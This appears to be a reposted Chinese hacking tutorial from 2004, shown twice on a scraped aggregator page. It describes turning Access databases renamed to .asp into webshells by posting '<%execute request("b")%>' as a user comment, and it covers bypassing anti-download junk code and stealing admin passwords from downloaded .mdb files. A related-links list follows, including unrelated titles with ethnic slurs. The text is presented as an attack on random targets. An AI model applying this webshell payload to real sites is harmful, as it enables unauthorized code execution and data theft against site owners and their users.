足球迷个性签名:[转贴]改mdb为asp所带来的灾难
来源:百度文库 编辑:九乡新闻网 时间:2024/04/29 15:58:32
改mdb为asp所带来的灾难
文/SuperHei·Lilo 2004-8-2
可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。
1. 思路
大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<% %>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。
2. 示例
随便找个目标,首先我们暴库,看是不是asp后缀的数据库:
返回:
Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp,行?4 Microsoft JET Database Engine 错误 '80004005' 'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 /test/conn.asp,行?
我们提交:返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供“网友评论”功能。我们注册个用户,发一条评论:
<%execute request("b")%>
这样我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:就是我们的webshell咯。提交:在乱码的最后我们看到:
/iisHelp/common/500-100.asp,行?4 Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配Åä: 'execut /test/dlog/log_mdb/%29dlog_mdb%29.asp,行?26
哈哈,我们的插入的代码运行了。如下图:
注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用<%execute request("b")%>。
3. 其他一些问题和思路
1.对于改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。
2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。
相关附件:改mdb为asp所带来的灾难.doc(103 K)
下载:http://4ngel.net/blog/hei/attachment.php?id=2
访问网址超出本站范围,不能确定是否安全
继续访问 取消访问','','','','a_alt_link','','',0,'',0,-1314,'',event);return false;" href="http://4ngel.net/blog/hei/attachment.php?id=2" target="_blank">http://4ngel.net/blog/hei/attachment.php?id=2
文/SuperHei·Lilo 2004-8-2
可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。
1. 思路
大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<% %>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。
2. 示例
随便找个目标,首先我们暴库,看是不是asp后缀的数据库:
返回:
Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp,行?4 Microsoft JET Database Engine 错误 '80004005' 'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 /test/conn.asp,行?
我们提交:
<%execute request("b")%>
这样我们就把asp代码:<%execute request("b")%>写入了数据库,那么数据库:就是我们的webshell咯。提交:
/iisHelp/common/500-100.asp,行?4 Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配Åä: 'execut /test/dlog/log_mdb/%29dlog_mdb%29.asp,行?26
哈哈,我们的插入的代码运行了。如下图:
注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用<%execute request("b")%>。
3. 其他一些问题和思路
1.对于改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。
2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。
相关附件:改mdb为asp所带来的灾难.doc(103 K)
下载:http://4ngel.net/blog/hei/attachment.php?id=2
访问网址超出本站范围,不能确定是否安全
继续访问 取消访问','','','','a_alt_link','','',0,'',0,-1314,'',event);return false;" href="http://4ngel.net/blog/hei/attachment.php?id=2" target="_blank">http://4ngel.net/blog/hei/attachment.php?id=2
[转贴]改mdb为asp所带来的灾难
改mdb为asp所带来地灾难
三个情人带来的灾难
什么是通货膨胀,所带来的影响
错误性爱观所带来的危害
室内挂画所带来的吉凶
“日本灾难”可能带来的9大变数
中篇科幻小说《甘露》(一)球形闪电带来的灾难
救温州 只能给中国带来无穷无尽的灾难
贫富悬殊可能带来货币灾难
[转贴]李白婚姻所带来的家庭悲剧 【史海钩沉】
地球的伤痕!11大人为灾难
史上最悲惨的十大人为灾难
由日本海啸灾难让我们所看到的、、、、
为还人情债带来的财富
户型存在缺角所带来的不利影响
婚前同居所带来的4个正面好处:
两个幸运数字所带来的双倍效果
孙禄堂晚年所改的三体式--神子
改短命为长寿的方法
改短命为长寿的方法1
改古诗词为散文的方法
中国人世代要牢记给我们带来的灾难的十个日本杂种
中国人世代要牢记给我们带来的灾难的十个日本杂种